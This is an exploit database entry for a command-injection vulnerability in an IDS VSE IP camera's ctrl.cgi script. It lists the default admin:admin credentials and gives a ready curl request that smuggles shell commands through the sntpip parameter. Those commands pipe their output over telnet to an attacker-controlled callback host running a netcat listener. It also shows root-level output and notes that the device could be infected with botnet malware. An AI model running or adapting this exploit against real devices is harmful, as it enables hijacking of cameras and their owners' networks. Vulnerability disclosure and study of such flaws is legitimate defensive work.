IDS VSE IP Camera - Authenticated Remote Code Execution Vulnerability

ID 1337DAY-ID-27569
Type zdt
Reporter whitepacket
Modified 2017-04-11T00:00:00


The ctrl.cgi script on the device's webserver that runs as root is vulnerable to remote command execution by an authenticated user, with the default password being "admin:admin". The sntpip GET parameter is fed to the command line by the CGI script without sanitization for semicolons, allowing any authenticated bad actor to escape out of the system command and execute commands of their choice. This is particularly dangerous because the platform this camera runs on is Linux and has wget which could be used for downloading malware. Anyone could infect these IP cameras for use in a botnet.#### Usage Info set the TARGET IP as well as PORT to a server you have access to that's listening on port 26 with nc (command: "nc -lv 26"). Commands set before the pipe character will be piped back to the telnet process and sent to the netcat listener to view the output. You can find these cameras here:

                                            curl --verbose "http://admin:[email protected]:PORT/ctrl.cgi?language=ie&sntpip=;uname%20-a|telnet%20CALLBACK%2026;&timezone=13&setdaylight=0&timeformat=2&tstampformat=2&timefrequency=-1"
curl command output:
* Connected to TARGET (TARGET) port PORT (#0)
* Server auth using Basic with user 'admin'
> GET /ctrl.cgi?language=ie&sntpip=;uname%20-a|telnet%20CALLBACK%2026;&timezone=13&setdaylight=0&timeformat=2&tstampformat=2&timefrequency=-1 HTTP/1.1
> Authorization: Basic YWRtaW46YWRtaW4=
> User-Agent: curl
> Accept: */*
< HTTP/1.1 200 OK
< Content-type: text/html
< Pragma: no-cache
< Cache-Control: no-store
* no chunk, no close, no size. Assume close to signal end
OK language
OK sntpip
OK timezone
OK setdaylight
UW timeformatOK tstampformat
OK timefrequency
* Closing connection 0

netcat output:
Connection from [TARGET] port 26 [tcp/*] accepted (family 2, sport 2101)
Linux IDSVSE 2.6.18_pro500-davinci_IDS_DM36x_1.1.5 #1 PREEMPT Tue Sep 20 09:08:48 CEST 2011 armv5tejl unknown

other fun output:
uid=0(root) gid=0(root)

BusyBox v1.2.2 (2007.03.11-00:56+0000) multi-call binary

Usage: busybox [function] [arguments]...
   or: [function] [arguments]...

	BusyBox is a multi-call binary that combines many common Unix
	utilities into a single executable.  Most people will create a
	link to busybox for each function they wish to use and BusyBox
	will act like whatever it was invoked as!

Currently defined functions:
	[, [[, addgroup, adduser, arping, ash, awk, basename, bunzip2,
	busybox, bzcat, cat, chgrp, chmod, chown, chroot, chvt, clear,
	cmp, cp, cpio, crond, crontab, cut, date, dc, dd, deallocvt, delgroup,
	deluser, devfsd, df, dirname, dmesg, dos2unix, du, echo, egrep,
	env, expr, false, fbset, fdisk, fgrep, find, fold, free, ftpget,
	ftpput, getty, grep, gunzip, gzip, halt, hdparm, head, hexdump,
	hostid, hostname, httpd, hwclock, id, ifconfig, ifdown, ifup,
	inetd, init, insmod, install, ip, ipcalc, kill, killall, klogd,
	last, length, linuxrc, ln, loadkmap, logger, login, logname, losetup,
	ls, lsmod, makedevs, md5sum, mesg, mkdir, mkfifo, mknod, mkswap,
	mktemp, modprobe, more, mount, mt, mv, nameif, nc, netstat, nice,
	nslookup, od, openvt, passwd, patch, pidof, ping, ping6, pivot_root,
	poweroff, printf, ps, pwd, rdate, readlink, realpath, reboot,
	renice, reset, rm, rmdir, rmmod, route, rpm2cpio, run-parts, rx,
	sed, seq, sh, sha1sum, sleep, sort, start-stop-daemon, strings,
	stty, su, sulogin, swapoff, swapon, sync, syslogd, tail, tar,
	tee, telnet, telnetd, test, tftp, time, top, touch, tr, traceroute,
	true, tty, umount, uname, uniq, unix2dos, unzip, uptime, usleep,
	uudecode, uuencode, vconfig, vi, vlock, watch, wc, wget, which,
	who, whoami, xargs, yes, zcat

# [2018-03-20]  #